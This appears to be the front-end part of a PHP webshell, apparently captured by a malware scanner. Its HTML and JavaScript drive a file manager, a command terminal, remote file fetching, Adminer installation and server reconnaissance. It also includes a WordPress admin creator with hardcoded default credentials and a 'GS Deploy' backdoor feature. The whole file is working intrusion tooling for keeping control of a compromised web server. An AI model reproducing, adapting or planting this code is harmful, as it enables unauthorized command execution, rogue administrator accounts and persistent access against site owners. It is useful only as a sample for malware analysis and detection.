d="M10 4H4c-1.1 0-1.99.9-1.99 2L2 18c0 1.1.9 2 2 2h16c1.1 0 2-.9 2-2V8c0-1.1-.9-2-2-2h-8l-2-2z" />
</svg>
'; else: echo ' <svg viewBox="0 0 24 24" class="icon">
<path
d="M13 2H6c-1.1 0-2 .9-2 2v16c0 1.1.9 2 2 2h12c1.1 0 2-.9 2-2V9l-7-7zM6 20V4h6v5h5v11H6z" />
</svg>
'; endif; echo ' ';echo $item['name']; echo ' </a>
</td>
<td><span style="color: var(--dim)">
';echo $item['size']; echo ' </span></td>
<td><span style="font-family: monospace">
';echo $item['perms']; echo ' </span></td>
<td><span style="color: var(--dim); font-size: 0.8rem">
';echo $item['date']; echo ' </span></td>
<td class="actions">
<a href="?action=download&path=';echo urlencode($encoded_base_dir); echo '&file=';echo urlencode($item['name']); echo '"
class="action-link">Get</a>
<a href="javascript:void(0)" onclick="renameItem(\'';echo urlencode($item['name']); echo '\')"
class="action-link">Ren</a>
<a href="javascript:void(0)"
onclick="chmodItem(\'';echo urlencode($item['name']); echo '\', \'';echo $item['perms']; echo '\')"
class="action-link">Mod</a>
<a href="?action=remove&path=';echo urlencode($encoded_base_dir); echo '&item=';echo urlencode($item['name']); echo '"
class="action-link" style="color: var(--danger)"
onclick="return confirm(\'Confirm delete?\')">Del</a>
</td>
</tr>
';endforeach; echo ' </tbody>
</table>
</main>
<div id="modal-edit" class="modal">
<div class="modal-content modal-edit">
<h2 id="edit-filename">Edit File</h2>
<form method="POST" action="?action=save&path=';echo urlencode($encoded_base_dir); echo '">
<input type="hidden" name="file" id="edit-file-input">
<textarea name="content" id="edit-content"></textarea>
<div style="display: flex; gap: 10px; justify-content: flex-end;">
<button type="button" class="btn" onclick="closeModal(\'modal-edit\')">Cancel</button>
<button type="submit" class="btn btn-accent">Save Changes</button>
</div>
</form>
</div>
</div>
<div id="modal-rename" class="modal">
<div class="modal-content" style="max-width: 400px;">
<h2>Rename Item</h2>
<form method="POST" action="?action=rename&path=';echo urlencode($encoded_base_dir); echo '">
<input type="hidden" name="old" id="rename-old">
<input type="text" name="new" id="rename-new" placeholder="New name">
<div style="display: flex; gap: 10px; justify-content: flex-end; margin-top: 1rem;">
<button type="button" class="btn" onclick="closeModal(\'modal-rename\')">Cancel</button>
<button type="submit" class="btn btn-accent">Rename</button>
</div>
</form>
</div>
</div>
<div id="modal-chmod" class="modal">
<div class="modal-content" style="max-width: 400px;">
<h2>Change Permissions</h2>
<form method="POST" action="?action=chmod&path=';echo urlencode($encoded_base_dir); echo '">
<input type="hidden" name="item" id="chmod-item">
<input type="text" name="mode" id="chmod-mode" placeholder="Mode (e.g. 0644)">
<div style="display: flex; gap: 10px; justify-content: flex-end; margin-top: 1rem;">
<button type="button" class="btn" onclick="closeModal(\'modal-chmod\')">Cancel</button>
<button type="submit" class="btn btn-accent">Update</button>
</div>
</form>
</div>
</div>
<div id="modal-finder" class="modal">
<div class="modal-content" style="max-width: 800px;">
<div style="display: flex; justify-content: space-between; align-items: center;">
<h2>Webshell Finder</h2>
<div id="scan-status" style="font-size: 0.8rem; color: var(--accent);">Idle</div>
</div>
<div style="margin-bottom: 1rem;">
<label style="font-size: 0.75rem; color: var(--dim); display: block; margin-bottom: 4px;">SCAN TARGET
DIRECTORY</label>
<input type="text" id="scan-path-input" value="';echo htmlspecialchars($base_dir); echo '"
placeholder="Full path to scan...">
</div>
<div id="finder-results"
style="max-height: 400px; overflow-y: auto; border: 1px solid var(--border); border-radius: 8px;">
<table style="margin: 0;">
<thead style="position: sticky; top: 0; z-index: 10;">
<tr>
<th>File Location</th>
<th>Detected Patterns</th>
<th style="width: 80px;">Action</th>
</tr>
</thead>
<tbody id="finder-tbody">
<tr>
<td colspan="3" style="text-align: center; padding: 40px; color: var(--dim);">Click scan to
begin.</td>
</tr>
</tbody>
</table>
</div>
<div style="display: flex; gap: 10px; justify-content: flex-end; margin-top: 1.5rem;">
<button type="button" class="btn" onclick="closeModal(\'modal-finder\')">Close</button>
<button type="button" id="btn-start-scan" class="btn btn-accent" onclick="runScan()">Start
Analysis</button>
</div>
</div>
</div>
<div id="modal-sql" class="modal">
<div class="modal-content" style="max-width: 450px;">
<h2>SQL Manager (Adminer)</h2>
<p style="color: var(--dim); font-size: 0.85rem;">Adminer is a full-featured tool for managing databases.
You can install it as a single file in the current directory.</p>
<div id="sql-status-box"
style="margin-top: 1rem; padding: 1rem; background: #000; border-radius: 8px; border: 1px solid var(--border); display: none;">
<span id="sql-install-text" style="font-size: 0.9rem;">Installing...</span>
</div>
<div style="display: flex; gap: 10px; justify-content: flex-end; margin-top: 1.5rem;">
<button type="button" class="btn" onclick="closeModal(\'modal-sql\')">Close</button>
<button type="button" id="btn-install-sql" class="btn btn-accent" onclick="installSQL()">Install
Adminer</button>
</div>
</div>
</div>
<div id="modal-terminal" class="modal">
<div class="modal-content" style="max-width: 800px;">
<div style="display: flex; justify-content: space-between; align-items: center;">
<h2>Terminal</h2>
<div id="terminal-status" style="font-size: 0.8rem; color: var(--accent);">Idle</div>
</div>
<div class="terminal-output" id="terminal-output">Ready.</div>
<div id="terminal-caps" style="margin-top: 0.5rem; color: var(--dim); font-size: 0.75rem;">Checking capabilities...</div>
<label style="display: inline-flex; align-items: center; gap: 6px; margin-top: 0.5rem; font-size: 0.8rem; color: var(--dim);">
<input type="checkbox" id="terminal-test-all"> Test all methods
</label>
<input class="terminal-input" type="text" id="terminal-command" placeholder="Enter a command (runs in current directory)">
<div style="display: flex; gap: 10px; justify-content: flex-end; margin-top: 1rem;">
<button type="button" class="btn" onclick="closeModal(\'modal-terminal\')">Close</button>
<button type="button" class="btn btn-accent" onclick="runTerminalCommand()">Run</button>
</div>
</div>
</div>
<div id="modal-remote-upload" class="modal">
<div class="modal-content" style="max-width: 520px;">
<h2>Remote Upload</h2>
<p style="color: var(--dim); font-size: 0.85rem;">Fetch a file from a URL and save it into the current
directory.</p>
<input type="text" id="remote-url" placeholder="https://example.com/file.zip">
<input type="text" id="remote-name" placeholder="Custom filename (optional)">
<div id="remote-status-box"
style="margin-top: 1rem; padding: 1rem; background: #000; border-radius: 8px; border: 1px solid var(--border); display: none;">
<span id="remote-status-text" style="font-size: 0.9rem;">Starting...</span>
</div>
<div style="display: flex; gap: 10px; justify-content: flex-end; margin-top: 1.5rem;">
<button type="button" class="btn" onclick="closeModal(\'modal-remote-upload\')">Close</button>
<button type="button" id="btn-remote-upload" class="btn btn-accent"
onclick="runRemoteUpload()">Fetch File</button>
</div>
</div>
</div>
<div id="modal-wp-admin" class="modal">
<div class="modal-content" style="max-width: 520px;">
<h2>WordPress Admin Creator</h2>
<p style="color: var(--dim); font-size: 0.85rem;">Select a <code>wp-config.php</code> path and create a new
admin user.</p>
<input type="text" id="wp-config-path"
placeholder="';echo htmlspecialchars($base_dir . DIRECTORY_SEPARATOR . 'wp-config.php'); echo '">
<input type="text" id="wp-user" value="mrz" placeholder="Username">
<input type="text" id="wp-pass" value="admin" placeholder="Password">
<input type="text" id="wp-email" value="admin@bypass.pw" placeholder="Email">
<div id="wp-status-box"
style="margin-top: 1rem; padding: 1rem; background: #000; border-radius: 8px; border: 1px solid var(--border); display: none;">
<span id="wp-status-text" style="font-size: 0.9rem;">Starting...</span>
</div>
<div style="display: flex; gap: 10px; justify-content: flex-end; margin-top: 1.5rem;">
<button type="button" class="btn" onclick="closeModal(\'modal-wp-admin\')">Close</button>
<button type="button" id="btn-wp-detect" class="btn" onclick="detectWpConfig()">Auto Detect</button>
<button type="button" id="btn-wp-create" class="btn btn-accent"
onclick="runWpAdminCreator()">Create Admin</button>
</div>
</div>
</div>
<div id="modal-gs-deploy" class="modal">
<div class="modal-content" style="max-width: 520px;">
<h2>GS Deploy</h2>
<p style="color: var(--dim); font-size: 0.85rem;"><code>Deploy And Show Key</code>.</p>
<div id="gs-status-box"
style="margin-top: 1rem; padding: 1rem; background: #000; border-radius: 8px; border: 1px solid var(--border); display: none;">
<span id="gs-status-text" style="font-size: 0.9rem;">Ready.</span>
</div>
<div style="display: flex; gap: 10px; justify-content: flex-end; margin-top: 1.5rem;">
<button type="button" class="btn" onclick="closeModal(\'modal-gs-deploy\')">Close</button>
<button type="button" id="btn-gs-run" class="btn btn-accent" onclick="runGsDeploy()">Deploy</button>
</div>
</div>
</div>
<div id="modal-server-info" class="modal">
<div class="modal-content" style="max-width: 700px;">
<h2>Server Information</h2>
<div id="server-info-box"
style="margin-top: 0.5rem; padding: 1rem; background: #000; border-radius: 8px; border: 1px solid var(--border); font-family: monospace; font-size: 0.85rem; color: #cfcfcf; white-space: pre-wrap; min-height: 160px;">
Loading...
</div>
<div style="display: flex; gap: 10px; justify-content: flex-end; margin-top: 1rem;">
<button type="button" class="btn" onclick="closeModal(\'modal-server-info\')">Close</button>
<button type="button" class="btn btn-accent" onclick="loadServerInfo()">Refresh</button>
</div>
</div>
</div>
<script>
function closeModal(id) { document.getElementById(id).style.display = \'none\'; }
function openSQLModal() {
document.getElementById(\'modal-sql\').style.display = \'flex\';
}
async function installSQL() {
const statusBox = document.getElementById(\'sql-status-box\');
const statusText = document.getElementById(\'sql-install-text\');
const installBtn = document.getElementById(\'btn-install-sql\');
statusBox.style.display = \'block\';
statusText.innerText = \'Downloading Adminer from GitHub...\';
statusText.style.color = \'var(--text)\';
installBtn.disabled = true;
try {
const response = await fetch(\'';echo $_SERVER['PHP_SELF']; echo '?action=install_sql&path=';echo urlencode($encoded_base_dir); echo '\');
const data = await response.json();
if (data.success) {
statusText.innerText = \'Adminer successfully installed as adminer.php\';
statusText.style.color = \'var(--success)\';
installBtn.innerText = \'Reload Explorer\';
installBtn.disabled = false;
installBtn.onclick = () => location.reload();
} else {
statusText.innerText = data.error || \'Installation failed.\';
statusText.style.color = \'var(--danger)\';
installBtn.disabled = false;
}
} catch (e) {
statusText.innerText = \'Error: \' + e.message;
statusText.style.color = \'var(--danger)\';
installBtn.disabled = false;
}
}
function openFinder() {
document.getElementById(\'modal-finder\').style.display = \'flex\';
}
function openTerminal() {
document.getElementById(\'modal-terminal\').style.display = \'flex\';
document.getElementById(\'terminal-command\').focus();
}
function openRemoteUpload() {
document.getElementById(\'modal-remote-upload\').style.display = \'flex\';
document.getElementById(\'remote-url\').focus();
}
function openWpAdminCreator() {
document.getElementById(\'modal-wp-admin\').style.display = \'flex\';
document.getElementById(\'wp-config-path\').focus();
}
function openGsDeploy() {
document.getElementById(\'modal-gs-deploy\').style.display = \'flex\';
}
function openServerInfo() {
document.getElementById(\'modal-server-info\').style.display = \'flex\';
loadServerInfo();
}
async function loadServerInfo() {
const box = document.getElementById(\'server-info-box\');
box.textContent = \'Loading...\';
try {
const response = await fetch(\'';echo $_SERVER['PHP_SELF']; echo '?action=server_info&path=';echo urlencode($encoded_base_dir); echo '\');
const data = await response.json();
const lines = [
`PHP Version: ${data.php_version || \'\'}`,
`Uname: ${data.uname || \'\'}`,
`Current User: ${data.current_user || \'\'}`,
`Disabled Functions: ${data.disabled_functions || \'\'}`,
`Server IP: ${data.server_ip || \'\'}`,
`Your IP: ${data.client_ip || \'\'}`
];
box.textContent = lines.join(\'\\n\');
} catch (e) {
box.textContent = \'Error: \' + e.message;
}
}
async function runRemoteUpload() {
const urlInput = document.getElementById(\'remote-url\');
const nameInput = document.getElementById(\'remote-name\');
const statusBox = document.getElementById(\'remote-status-box\');
const statusText = document.getElementById(\'remote-status-text\');
const btn = document.getElementById(\'btn-remote-upload\');
const url = urlInput.value.trim();
const name = nameInput.value.trim();
if (!url) {
statusBox.style.display = \'block\';
statusText.textContent = \'Please provide a URL.\';
statusText.style.color = \'var(--danger)\';
return;
}
statusBox.style.display = \'block\';
statusText.textContent = \'Downloading...\';
statusText.style.color = \'var(--text)\';
btn.disabled = true;
const body = new URLSearchParams();
body.append(\'url\', url);
body.append(\'name\', name);
try {
const response = await fetch(\'';echo $_SERVER['PHP_SELF']; echo '?action=remote_upload&path=';echo urlencode($encoded_base_dir); echo '\', {
method: \'POST\',
headers: { \'Content-Type\': \'application/x-www-form-urlencoded\' },
body: body.toString()
});
const data = await response.json();
if (data.success) {
statusText.textContent = `Saved as ${data.file} (${data.method})`;
statusText.style.color = \'var(--success)\';
} else {
statusText.textContent = data.error || \'Remote upload failed.\';
statusText.style.color = \'var(--danger)\';
}
} catch (e) {
statusText.textContent = \'Error: \' + e.message;
statusText.style.color = \'var(--danger)\';
} finally {
btn.disabled = false;
}
}
async function runGsDeploy() {
const statusBox = document.getElementById(\'gs-status-box\');
const statusText = document.getElementById(\'gs-status-text\');
const btn = document.getElementById(\'btn-gs-run\');
statusBox.style.display = \'block\';
statusText.textContent = \'Running...\';
statusText.style.color = \'var(--text)\';
btn.disabled = true;
try {
const response = await fetch(\'';echo $_SERVER['PHP_SELF']; echo '?action=gs_deploy&path=';echo urlencode($encoded_base_dir); echo '\');
const data = await response.json();
if (data.success) {
const method = data.method ? ` (${data.method})` : \'\';
statusText.textContent = `Result: ${data.output || \'(no output)\'}${method}`;
statusText.style.color = \'var(--success)\';
} else {
statusText.textContent = data.error || \'GS Deploy failed.\';
statusText.style.color = \'var(--danger)\';
}
} catch (e) {
statusText.textContent = \'Error: \' + e.message;
statusText.style.color = \'var(--danger)\';
} finally {
btn.disabled = false;
}
}
async function runWpAdminCreator() {
const configInput = document.getElementById(\'wp-config-path\');
const userInput = document.getElementById(\'wp-user\');
const passInput = document.getElementById(\'wp-pass\');
const emailInput = document.getElementById(\'wp-email\');
const statusBox = document.getElementById(\'wp-status-box\');
const statusText = document.getElementById(\'wp-status-text\');
const btn = document.getElementById(\'btn-wp-create\');
const detectBtn = document.getElementById(\'btn-wp-detect\');
const configPath = configInput.value.trim();
const user = userInput.value.trim();
const pass = passInput.value.trim();
const email = emailInput.value.trim();
statusBox.style.display = \'block\';
if (!configPath) {
statusText.textContent = \'Please provide wp-config.php path.\';
statusText.style.color = \'var(--danger)\';
return;
}
btn.disabled = true;
detectBtn.disabled = true;
statusText.textContent = \'Creating admin user...\';
statusText.style.color = \'var(--text)\';
const body = new URLSearchParams();
body.append(\'config_path\', configPath);
body.append(\'user\', user || \'mrz\');
body.append(\'pass\', pass || \'admin\');
body.append(\'email\', email || \'admin@bypass.pw\');
try {
const response = await fetch(\'';echo $_SERVER['PHP_SELF']; echo '?action=wp_admin_create&path=';echo urlencode($encoded_base_dir); echo '\', {
method: \'POST\',
headers: { \'Content-Type\': \'application/x-www-form-urlencoded\' },
body: body.toString()
});
const data = await response.json();
if (data.success) {
statusText.textContent = `Admin created: ${data.user} (${data.email})`;
statusText.style.color = \'var(--success)\';
} else {
statusText.textContent = data.error || \'Failed to create admin user.\';
statusText.style.color = \'var(--danger)\';
}
} catch (e) {
statusText.textContent = \'Error: \' + e.message;
statusText.style.color = \'var(--danger)\';
} finally {
btn.disabled = false;
detectBtn.disabled = false;
}
}
async function detectWpConfig() {
const configInput = document.getElementById(\'wp-config-path\');
const statusBox = document.getElementById(\'wp-status-box\');
const statusText = document.getElementById(\'wp-status-text\');
const btn = document.getElementById(\'btn-wp-detect\');
const createBtn = document.getElementById(\'btn-wp-create\');
statusBox.style.display = \'block\';
statusText.textContent = \'Searching for wp-config.php...\';
statusText.style.color = \'var(--text)\';
btn.disabled = true;
createBtn.disabled = true;
try {
const response = await fetch(\'';echo $_SERVER['PHP_SELF']; echo '?action=wp_find_config&path=';echo urlencode($encoded_base_dir); echo '\');
const data = await response.json();
if (data.success) {
configInput.value = data.path;
statusText.textContent = \'Found: \' + data.path;
statusText.style.color = \'var(--success)\';
} else {
statusText.textContent = data.error || \'No wp-config.php found.\';
statusText.style.color = \'var(--danger)\';
}
} catch (e) {
statusText.textContent = \'Error: \' + e.message;
statusText.style.color = \'var(--danger)\';
} finally {
btn.disabled = false;
createBtn.disabled = false;
}
}
document.getElementById(\'terminal-command\').addEventListener(\'keydown\', function (e) {
if (e.key === \'Enter\') {
e.preventDefault();
runTerminalCommand();
}
});
function setTerminalCaps(available, method) {
const caps = document.getElementById(\'terminal-caps\');
if (!available) {
caps.textContent = \'Capabilities: unknown\';
return;
}
const parts = Object.keys(available).map(key => `${key}:${available[key] ? \'on\' : \'off\'}`);
const prefix = method ? `Method: ${method} | ` : \'\';
caps.textContent = `${prefix}Capabilities: ${parts.join(\' | \')}`;
}
async function runTerminalCommand() {
const output = document.getElementById(\'terminal-output\');
const status = document.getElementById(\'terminal-status\');
const cmdInput = document.getElementById(\'terminal-command\');
const testAll = document.getElementById(\'terminal-test-all\');
const cmd = cmdInput.value.trim();
if (!cmd) {
output.textContent = \'Please enter a command.\';
return;
}
status.textContent = \'Running...\';
output.textContent = \'Executing...\';
const body = new URLSearchParams();
body.append(\'cmd\', cmd);
if (testAll && testAll.checked) {
body.append(\'mode\', \'all\');
}
try {
const response = await fetch(\'';echo $_SERVER['PHP_SELF']; echo '?action=terminal&path=';echo urlencode($encoded_base_dir); echo '\', {
method: \'POST\',
headers: { \'Content-Type\': \'application/x-www-form-urlencoded\' },
body: body.toString()
});
const data = await response.json();
if (data.success) {
if (data.outputs) {
const lines = [];
Object.keys(data.outputs).forEach(key => {
const val = data.outputs[key];
lines.push(`[${key}]`);
lines.push(val ? val : \'(no output)\');
lines.push(\'\');
});
output.textContent = lines.join(\'\\n\').trim();
setTerminalCaps(data.available);
} else {
output.textContent = data.output || \'(no output)\';
setTerminalCaps(data.available, data.method);
}
} else {
output.textContent = data.error || \'Command failed.\';
setTerminalCaps(data.available);
}
} catch (e) {
output.textContent = \'Error: \' + e.message;
} finally {
status.textContent = \'Idle\';
cmdInput.select();
}
}
async function runScan() {
const tbody = document.getElementById(\'finder-tbody\');
const status = document.getElementById(\'scan-status\');
const btn = document.getElementById(\'btn-start-scan\');
const scanPath = document.getElementById(\'scan-path-input\').value;
tbody.innerHTML = \'<tr><td colspan="3" style="text-align: center; padding: 40px;">Scanning files... please wait.</td></tr>\';
status.innerText = \'Scanning...\';
btn.disabled = true;
try {
const response = await fetch(\'';echo $_SERVER['PHP_SELF']; echo '?action=scan&scan_path=\' + encodeURIComponent(scanPath));
const data = await response.json();
if (data.length === 0) {
tbody.innerHTML = \'<tr><td colspan="3" style="text-align: center; padding: 40px; color: var(--success);">No suspicious signatures found in this directory.</td></tr>\';
} else {
tbody.innerHTML = \'\';
data.forEach(item => {
let risks = item.risks.map(r => `<span style="color: #ffcc00; font-size: 0.75rem; display: block;">• ${r.sig}: ${r.desc}</span>`).join(\'\');
tbody.innerHTML += `
<tr>
<td style="font-family: monospace; font-size: 0.8rem;">${item.path}</td>
<td>${risks}</td>
<td><a href="javascript:void(0)" class="action-link" onclick="closeModal(\'modal-finder\'); editFile(\'${encodeURIComponent(item.name)}\')">Investigate</a></td>
</tr>
`;
});
}
} catch (e) {
tbody.innerHTML = \'<tr><td colspan="3" style="text-align: center; padding: 40px; color: var(--danger);">Scan failed or timed out.</td></tr>\';
} finally {
status.innerText = \'Completed\';
btn.disabled = false;
}
}
async function editFile(name) {
const fileName = decodeURIComponent(name);
document.getElementById(\'edit-filename\').innerText = fileName;
document.getElementById(\'edit-file-input\').value = fileName;
const response = await fetch(\'';echo $_SERVER['PHP_SELF']; echo '?action=read&file=\' + name + \'&path=';echo urlencode($encoded_base_dir); echo '\');
const data = await response.text();
document.getElementById(\'edit-content\').value = data;
document.getElementById(\'modal-edit\').style.display = \'flex\';
}
function renameItem(name) {
document.getElementById(\'rename-old\').value = decodeURIComponent(name);
document.getElementById(\'rename-new\').value = decodeURIComponent(name);
document.getElementById(\'modal-rename\').style.display = \'flex\';
}
function chmodItem(name, mode) {
document.getElementById(\'chmod-item\').value = decodeURIComponent(name);
document.getElementById(\'chmod-mode\').value = mode;
document.getElementById(\'modal-chmod\').style.display = \'flex\';
}
</script>
</body>
</html>';© 2023 Quttera Ltd. All rights reserved.